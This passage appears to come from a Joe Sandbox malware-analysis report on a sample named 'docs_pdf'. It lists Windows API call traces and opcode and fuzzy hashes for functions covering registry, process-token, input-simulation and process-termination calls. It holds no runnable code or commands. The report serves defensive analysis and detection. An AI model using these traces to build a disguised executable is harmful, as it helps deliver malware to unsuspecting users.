                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
                                                            • Instruction ID: a1e6a19de1c655cf6c89fef1042c3070e64739173ab3d20f5268fadb1268035c
                                                            • Opcode Fuzzy Hash: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
                                                            • Instruction Fuzzy Hash: 301190B2154219BFEF159F60CC85EE77F6DEF08758F018114BA08A2090CB729C61DBA0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00114292,?), ref: 001141E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001141EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 001141F6
                                                            • DecodePointer.KERNEL32(00000001,00114292,?), ref: 00114213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
                                                            • Instruction ID: a2ef5f2634d650bc005ddc572c367c93488d3c4d1bb4136183f984c92e2b3ef4
                                                            • Opcode Fuzzy Hash: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
                                                            • Instruction Fuzzy Hash: E5E01AB4A90300AFEF207FB8EC09B453AE5BB20B02F508638F555D58A1DBB560D6CF00
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001141B8), ref: 001142B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001142BF
                                                            • EncodePointer.KERNEL32(00000000), ref: 001142CA
                                                            • DecodePointer.KERNEL32(001141B8), ref: 001142E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
                                                            • Instruction ID: 49b3f410f6ab054de0143c7674f421a502135dd4e4784677d92642ed14d6e14f
                                                            • Opcode Fuzzy Hash: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
                                                            • Instruction Fuzzy Hash: BEE0BF7C9813109BEB209B64FC0DF453AB4F714B42F108228F105E19A1CB7455C5CB14
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                                                            • Instruction ID: 1a185bcdb39c1444ef95666478604f0daa1e10f05ae4e6ff8a66dc07a64b4057
                                                            • Opcode Fuzzy Hash: 85db79b2357762b9e250be41096e75e0a8b11e2f4c8f4dceac26103551ccb84f
                                                            • Instruction Fuzzy Hash: 5E61CD3090424AEBCF15EF64CC82FFE77A4AF08308F454419FE695B292DB30A849DB91
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00170588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001705AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001705D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00170617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170624
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 2081cffac07448c8523d2d3061f5d2d659fdfca4bf570d0dd5262734fd9c5dc1
                                                            • Instruction ID: 257e4691509b0785eef6c8d7d289fedc359225c0c3f265a2acacbf6847694bb5
                                                            • Opcode Fuzzy Hash: 2081cffac07448c8523d2d3061f5d2d659fdfca4bf570d0dd5262734fd9c5dc1
                                                            • Instruction Fuzzy Hash: DD513631508304AFC715EB24C885EAFBBB9FF88314F04892DF649872A2DB31E945DB52
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00175A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00175AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00175AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00175B50
                                                            • GetSubMenu.USER32(?,?), ref: 00175B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00175BAF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 7748b9f84cabdc1cb5576ac8ff06b702ed85c7876c8e899fe5b6ec308229b559
                                                            • Instruction ID: b71ec5a52b7498a5fd734d5fc76dc8aae7abcefa8a91dfc1f2e8c86208848b74
                                                            • Opcode Fuzzy Hash: 7748b9f84cabdc1cb5576ac8ff06b702ed85c7876c8e899fe5b6ec308229b559
                                                            • Instruction Fuzzy Hash: 2B518F35A00619EFCB15DF64C845AEEB7B6EF48310F108469F919BB351CBB0AE81CB90
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0014F3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 0014F469
                                                            • VariantClear.OLEAUT32(00000000), ref: 0014F4C4
                                                            • _memmove.LIBCMT ref: 0014F4EE
                                                            • VariantClear.OLEAUT32(?), ref: 0014F53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0014F569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
                                                            • Instruction ID: b0f9bcfa93efc5452ef4a72f376ac4c28d3a533f7f66bd5578f986b8f63d7675
                                                            • Opcode Fuzzy Hash: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
                                                            • Instruction Fuzzy Hash: 1E5136B5A00209AFCB14CF58D884AAAB7B8FF4C354F15856EE959DB311D730E952CBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152792
                                                            • IsMenu.USER32(00000000), ref: 001527B2
                                                            • CreatePopupMenu.USER32 ref: 001527E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00152844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00152875
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
                                                            • Instruction ID: 72f09d829d56f04e46662b9df9557df7edeca6c93d3e6704cc532e05f5a838ef
                                                            • Opcode Fuzzy Hash: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
                                                            • Instruction Fuzzy Hash: A351C072A00309DFDF24CFA8D888AAEBBF5AF56315F104169EC359F290D7709948CB51
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 000F179A
                                                            • GetWindowRect.USER32(?,?), ref: 000F17FE
                                                            • ScreenToClient.USER32(?,?), ref: 000F181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000F182C
                                                            • EndPaint.USER32(?,?), ref: 000F1876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
                                                            • Instruction ID: 9932bc396478b773977a1e7c2d38a2165bd76622f9ada49fc3faa244c359c419
                                                            • Opcode Fuzzy Hash: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
                                                            • Instruction Fuzzy Hash: B641AE71104304EFD710DF24DC84BBA7BF8EB59724F140628FA98875A2CB359C86EB61
                                                            APIs
                                                            • ShowWindow.USER32(001B67B0,00000000,00E95A00,?,?,001B67B0,?,0017B862,?,?), ref: 0017B9CC
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0017B9F0
                                                            • ShowWindow.USER32(001B67B0,00000000,00E95A00,?,?,001B67B0,?,0017B862,?,?), ref: 0017BA50
                                                            • ShowWindow.USER32(00000000,00000004,?,0017B862,?,?), ref: 0017BA62
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0017BA86
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0017BAA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
                                                            • Instruction ID: 85eb989919abd3cdc4f11dcbc32a837538d4769e383cd9a494154c922d7bfc48
                                                            • Opcode Fuzzy Hash: ce1cd3123f9da668c42172442bcd6c1676a8af9e49b800e80d2194496ff36d10
                                                            • Instruction Fuzzy Hash: 70413E74648241AFDB26DF24C4C9B957BF1FB05314F1882B9FA5C8F6A2C731A886CB51
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00165134,?,?,00000000,00000001), ref: 001673BF
                                                              • Part of subcall function 00163C94: GetWindowRect.USER32(?,?), ref: 00163CA7
                                                            • GetDesktopWindow.USER32 ref: 001673E9
                                                            • GetWindowRect.USER32(00000000), ref: 001673F0
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00167422
                                                              • Part of subcall function 001554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            • GetCursorPos.USER32(?), ref: 0016744E
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001674AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
                                                            • Instruction ID: 5c506905e089d31e1f015fcb34c37ec665049488649b0137c4e5581af544a225
                                                            • Opcode Fuzzy Hash: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
                                                            • Instruction Fuzzy Hash: 1231D272509305AFD720DF14DC49E9BBBAAFF88314F00091DF59897191DB30E959CB92
                                                            APIs
                                                              • Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
                                                              • Part of subcall function 001485F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
                                                              • Part of subcall function 001485F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
                                                              • Part of subcall function 001485F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
                                                              • Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E
                                                            • GetLengthSid.ADVAPI32(?,00000000,00148977), ref: 00148DAC
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00148DB8
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00148DBF
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00148DD8
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00148977), ref: 00148DEC
                                                            • HeapFree.KERNEL32(00000000), ref: 00148DF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
                                                            • Instruction ID: c67af6cd4d70be096eecfe8871e5276fc3c1d8cf82724968c0781e997ea5c2d0
                                                            • Opcode Fuzzy Hash: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
                                                            • Instruction Fuzzy Hash: A1119A31902A05EBDB149BA4CC09BBF7BBAEB55325F104029E849972A0DB329981DB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00148B2A
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00148B31
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00148B40
                                                            • CloseHandle.KERNEL32(00000004), ref: 00148B4B
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00148B7A
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00148B8E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
                                                            • Instruction ID: 355b2d157dd59b7e73626e97b6d8b964f7fc8cad88004a03888d4b946002f4b1
                                                            • Opcode Fuzzy Hash: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
                                                            • Instruction Fuzzy Hash: 7F1117B2501249AFDB018FA4ED49FDE7BB9FF08344F144169FA08A2160C7769DA1AB60
                                                            APIs
                                                              • Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
                                                              • Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0017C1C4
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0017C1D8
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C1E6
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0017C1F6
                                                            • EndPath.GDI32(00000000), ref: 0017C206
                                                            • StrokePath.GDI32(00000000), ref: 0017C216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
                                                            • Instruction ID: 4c9caf443fd0f0a9f169c93205a64ab8b3b1a137b71d53db5516c3b140f2d7d7
                                                            • Opcode Fuzzy Hash: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
                                                            • Instruction Fuzzy Hash: 3111097640010CBFDB119F90DC88EEA7FADEB08354F048025BA185A5A2C7719D95DBA0
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
                                                            • Instruction ID: 18dcc5a2073779331193044123c368d8b33cca5038426ad3746165417a6080e0
                                                            • Opcode Fuzzy Hash: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
                                                            • Instruction Fuzzy Hash: 3A0148B09417597DE3008F5A8C85A52FEA8FF19354F00411BA15C47941C7B5A864CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0015569B
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001556B1
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 001556C0
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556CF
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556D9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
